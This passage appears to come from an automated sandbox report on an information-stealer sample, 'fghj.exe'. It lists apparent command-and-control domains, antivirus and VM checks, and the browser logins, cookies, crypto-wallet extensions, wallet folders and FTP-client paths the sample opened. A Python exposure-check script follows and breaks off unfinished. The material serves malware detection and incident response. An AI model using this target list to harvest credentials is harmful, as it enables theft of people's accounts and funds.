              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696497155t
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696497155s
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
              Source: C:\Users\user\Desktop\fghj.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A693D LoadLibraryW,GetProcAddress
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B0038B mov edx, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B0094B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B00CFB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B00F9A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B00F9B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A4523 GetProcessHeap,HeapFree

              HIPS / PFW / Operating System Protection Evasion

              Source: fghj.exe | String found in binary or memory: debonairnukk.xyz
              Source: fghj.exe | String found in binary or memory: effecterectz.xyz
              Source: fghj.exe | String found in binary or memory: diffuculttan.xyz
              Source: fghj.exe | String found in binary or memory: immureprech.biz
              Source: fghj.exe | String found in binary or memory: deafeninggeh.biz
              Source: fghj.exe | String found in binary or memory: spellshagey.biz
              Source: C:\Users\user\Desktop\fghj.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A6DD4 GetSystemTime
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A2826 GetVersionExA
              Source: C:\Users\user\Desktop\fghj.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: fghj.exe, 00000000.00000003.1612725977.0000000000D08000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1613869748.0000000000D08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\fghj.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: fghj.exe PID: 7372, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum-LTC
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
              Source: fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty
              Source: fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: pdata%\\Exodus\\Td
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
              Source: fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\Binanceq)h
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
              Source: fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
              Source: fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\fghj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
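The "File opened" entries above are the stealer's target list: it probes each wallet, FTP-client and Chrome-extension location and reads whatever exists. For incident response the useful question is the reverse one: which of those locations existed on the victim, because those are the credential stores that must be treated as compromised. The script below is an added example, not code from the Joe Sandbox report or from the sample; it re-expresses the paths listed above relative to the Windows profile folders (APPDATA, LOCALAPPDATA, PROGRAMDATA) and reports which ones are present under a given root. The demo profile tree it builds is constructed for the example.

```python
"""Exposure check derived from the "File opened" entries of this report.

Added example, not part of the Joe Sandbox report. It lists the locations the
sample opened, joined under the Windows profile folders, and reports which of
them exist so a responder can scope which credential stores were readable.
"""
import os
import tempfile

CHROME_EXT = ("Google", "Chrome", "User Data", "Default", "Local Extension Settings")

# (profile root, path components relative to that root, label).
# APPDATA is AppData\Roaming, LOCALAPPDATA is AppData\Local, PROGRAMDATA is C:\ProgramData.
# Every entry below is one "File opened" line from the report.
TARGETS = [
    ("LOCALAPPDATA", CHROME_EXT + ("hcflpincpppdclinealmandijcmnkbgn",), "Chrome extension hcflpincpppdclinealmandijcmnkbgn"),
    ("LOCALAPPDATA", CHROME_EXT + ("ffnbelfdoeiohenkjibnmadjiehjhajb",), "Chrome extension ffnbelfdoeiohenkjibnmadjiehjhajb"),
    ("LOCALAPPDATA", CHROME_EXT + ("ilgcnhelpchnceeipipijaljkblbcob",), "Chrome extension ilgcnhelpchnceeipipijaljkblbcob"),
    ("LOCALAPPDATA", CHROME_EXT + ("kpfopkelmapcoipemfendmdcghnegimn",), "Chrome extension kpfopkelmapcoipemfendmdcghnegimn"),
    ("APPDATA", ("FTPGetter",), "FTPGetter"),
    ("APPDATA", ("FTPRush",), "FTPRush"),
    ("APPDATA", ("FTPbox",), "FTPbox"),
    ("APPDATA", ("SmartFTP", "Client 2.0", "Favorites"), "SmartFTP favorites"),
    ("PROGRAMDATA", ("SiteDesigner", "3D-FTP"), "3D-FTP"),
    ("APPDATA", ("FTPInfo",), "FTPInfo"),
    ("APPDATA", ("Conceptworld", "Notezilla"), "Notezilla"),
    ("APPDATA", ("Exodus", "exodus.wallet"), "Exodus wallet"),
    ("APPDATA", ("Ledger Live",), "Ledger Live"),
    ("APPDATA", ("atomic", "Local Storage", "leveldb"), "Atomic wallet"),
    ("LOCALAPPDATA", ("Coinomi", "Coinomi", "wallets"), "Coinomi wallets"),
    ("APPDATA", ("Bitcoin", "wallets"), "Bitcoin Core wallets"),
    ("APPDATA", ("Binance",), "Binance"),
    ("APPDATA", ("com.liberty.jaxx", "IndexedDB"), "Jaxx Liberty"),
    ("APPDATA", ("Electrum", "wallets"), "Electrum wallets"),
    ("APPDATA", ("Electrum-LTC", "wallets"), "Electrum-LTC wallets"),
    ("APPDATA", ("Guarda", "IndexedDB"), "Guarda"),
]


def resolve_targets(roots):
    """Map each target to an absolute path under the supplied root folders."""
    return [(label, os.path.join(roots[root], *parts)) for root, parts, label in TARGETS]


def find_exposed(roots):
    """Return the labels of targeted locations that exist under the given roots."""
    return [label for label, path in resolve_targets(roots) if os.path.exists(path)]


def roots_from_environment():
    """Roots for a live Windows host; raises KeyError elsewhere, by design."""
    return {k: os.environ[k] for k in ("APPDATA", "LOCALAPPDATA", "PROGRAMDATA")}


def demo_run():
    """Constructed profile tree in which an Exodus wallet and one targeted extension exist."""
    base = tempfile.mkdtemp()
    roots = {
        "APPDATA": os.path.join(base, "Roaming"),
        "LOCALAPPDATA": os.path.join(base, "Local"),
        "PROGRAMDATA": os.path.join(base, "ProgramData"),
    }
    os.makedirs(os.path.join(roots["APPDATA"], "Exodus", "exodus.wallet"))
    os.makedirs(os.path.join(roots["LOCALAPPDATA"], *CHROME_EXT, "kpfopkelmapcoipemfendmdcghnegimn"))
    return find_exposed(roots)


if __name__ == "__main__":
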